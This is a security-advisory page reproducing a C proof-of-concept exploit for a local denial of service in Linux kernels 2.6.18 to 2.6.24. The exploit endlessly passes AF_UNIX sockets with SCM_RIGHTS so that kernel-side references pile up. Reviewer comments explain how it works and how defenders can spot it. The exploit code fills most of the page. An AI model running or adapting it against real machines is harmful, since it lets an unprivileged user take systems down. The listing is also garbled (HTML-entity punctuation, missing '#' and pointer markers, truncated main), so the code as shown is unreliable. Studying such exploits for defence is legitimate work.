Linux Kernel 2.6.18/2.6.24/2.6.20/2.6.22/2.6.21 denial of service exploit

2009-01-04T00:00:00
ID SECURITYVULNS:DOC:21101
Type securityvulns
Reporter Securityvulns
Modified 2009-01-04T00:00:00

Description

/* Linux Kernel 2.6.18/2.6.24/2.6.20/2.6.22/2.6.21 denial of service exploit

Author : Adurit Team >> djekmani4ever

Home : www.hightsec.com

greetz : adurit team - v4-team - Zigma - stack - Mr.safa7 - king sabri - alphanix - and all my friends

note : this code for education :) */

include <sys/socket.h>

include <sys/un.h>

include <unistd.h>

include <assert.h>

include <err.h>

include <stdlib.h>

/*
 * own_child - fork a helper process that, in an endless loop, creates a new
 * AF_UNIX socket pair and passes one end of it as an SCM_RIGHTS ancillary
 * message over the socket it currently holds.
 *
 * us: the socket pair created by own(); the code indexes it as us[0] (the
 *     end the parent keeps) and us[1] (the end the child keeps).
 *
 * Returns the child's pid in the parent. The child has no return path: it
 * stays in the while (1) loop until err()/errx() ends the process.
 *
 * NOTE(review): the listing is kept exactly as published, including the
 * HTML-entity-encoded punctuation; it is not compilable as shown.
 *
 * Defender's reading: every iteration opens two descriptors and closes two
 * (s[0] and the previous us[1]), so the child's descriptor table does not
 * grow and a per-process open-file limit does not bound the loop. What
 * accumulates is kernel-side: each passed socket is, as far as the visible
 * code shows, referenced only by the message queued on the previous one.
 * The page title calls the outcome a denial of service on the listed 2.6.x
 * kernels; the kernel-side failure itself is not shown here, and the page
 * names no fix -- check the vendor kernel advisories for those versions.
 * A sustained socketpair()/sendmsg()/close() pattern from one unprivileged
 * process is the observable behaviour (e.g. via syscall auditing) --
 * presumably rare in normal workloads; verify against your baseline.
 */
static int own_child(int us) { int pid; int s[2]; struct msghdr mh; char crap[1024]; struct iovec iov; struct cmsghdr c; int *fd; int rc;

    pid = fork&#40;&#41;;
    if &#40;pid == -1&#41;
            err&#40;1, &quot;fork&#40;&#41;&quot;&#41;;

    /* Parent: drop the child's end of the pair and report the child's pid. */
    if &#40;pid&#41; {
          close&#40;us[1]&#41;;

            return pid;
    }

    /* Child: drop the parent's end; only us[1] is used from here on. */
    close&#40;us[0]&#41;;

    /* One byte of ordinary payload ("a") carries the ancillary data. */
    memset&#40;&amp;mh, 0, sizeof&#40;mh&#41;&#41;;
    iov.iov_base = &quot;a&quot;;
    iov.iov_len  = 1;

    /* crap[] is the control buffer; its full size is set only so that
       CMSG_FIRSTHDR() yields a header, and is narrowed again below. */
    mh.msg_iov        = &amp;iov;
    mh.msg_iovlen     = 1;
    mh.msg_control    = crap;
    mh.msg_controllen = sizeof&#40;crap&#41;;

    c = CMSG_FIRSTHDR&#40;&amp;mh&#41;;
    assert&#40;c&#41;;

    /* SOL_SOCKET / SCM_RIGHTS: the control message carries a descriptor. */
    c-&gt;cmsg_level = SOL_SOCKET;
    c-&gt;cmsg_type  = SCM_RIGHTS;

    /* fd points into the control buffer; the loop rewrites it every turn. */
    fd = &#40;int*&#41; CMSG_DATA&#40;c&#41;;
    assert&#40;fd&#41;;

    /* Exactly one int (one descriptor) per message. */
    c-&gt;cmsg_len = CMSG_LEN&#40;sizeof&#40;int&#41;&#41;;
    mh.msg_controllen = c-&gt;cmsg_len;

    while &#40;1&#41; {
            if &#40;socketpair&#40;PF_UNIX, SOCK_STREAM, 0, s&#41; == -1&#41;
                    err&#40;1, &quot;socketpair&#40;&#41;&quot;&#41;;

            /* Pass s[0] over the socket currently held in us[1]. */
            *fd = s[0];

            rc = sendmsg&#40;us[1], &amp;mh, 0&#41;;
            if &#40;rc == -1&#41;
                    err&#40;1, &quot;sendmsg&#40;&#41;&quot;&#41;;

            if &#40;rc != iov.iov_len&#41;
                    errx&#40;1, &quot;sent short&quot;&#41;;

            /* Close the local copy of the passed descriptor and the old
               sender, then continue on s[1], the peer of the socket that
               was just passed. */
            close&#40;s[0]&#41;;
            close&#40;us[1]&#41;;
            us[1] = s[1];
    }

}

/*
 * own - parent-side half of the descriptor-passing setup.
 *
 * On the first call (static pid still zero) it creates the initial AF_UNIX
 * socket pair and starts the sending child through own_child(). It then
 * receives one message on us[0], asserts that the first control header is
 * SCM_RIGHTS, closes us[0] and stores the received descriptor in its place.
 *
 * pid and us are static, so they persist across calls; main(), visible at
 * the end of the listing, calls own() once and then exit(0).
 *
 * NOTE(review): only cmsg_type is asserted; cmsg_level and cmsg_len of the
 * received header are not checked before the descriptor is read.
 * NOTE(review): the listing is kept exactly as published, including the
 * HTML-entity-encoded punctuation; it is not compilable as shown.
 */
static void own(void) {
static int pid; static int us[2]; char crap[1024]; char morte[1024]; struct cmsghdr c; int rc; struct msghdr mh; struct iovec iov; int fds;

    /* First call only: create the pair and fork the sender. */
    if &#40;!pid&#41; {
            if &#40;socketpair&#40;PF_UNIX, SOCK_STREAM, 0, us&#41; == -1&#41;
                    err&#40;1, &quot;socketpair&#40;&#41;&quot;&#41;;
            pid = own_child&#40;us&#41;;
    }

    /* morte[] receives the ordinary payload, crap[] the ancillary data. */
    iov.iov_base = morte;
    iov.iov_len  = sizeof&#40;morte&#41;;

    memset&#40;&amp;mh, 0, sizeof&#40;mh&#41;&#41;;
    mh.msg_iov        = &amp;iov;
    mh.msg_iovlen     = 1;
    mh.msg_control    = crap;
    mh.msg_controllen = sizeof&#40;crap&#41;;

    rc = recvmsg&#40;us[0], &amp;mh, 0&#41;;
    if &#40;rc == -1&#41;
            err&#40;1, &quot;recvmsg&#40;&#41;&quot;&#41;;

    /* A zero-length read is treated as the peer having gone away. */
    if &#40;rc == 0&#41;
            errx&#40;1, &quot;EOF&quot;&#41;;

    c = CMSG_FIRSTHDR&#40;&amp;mh&#41;;
    assert&#40;c&#41;;
    assert&#40;c-&gt;cmsg_type == SCM_RIGHTS&#41;;

    fds = &#40;int*&#41; CMSG_DATA&#40;c&#41;;
    assert&#40;fds&#41;;

    /* Swap the receiving end for the descriptor that was just received. */
    close&#40;us[0]&#41;;
    us[0] = *fds;

}

int main(int argc, char *argv[]) { own(); exit(0);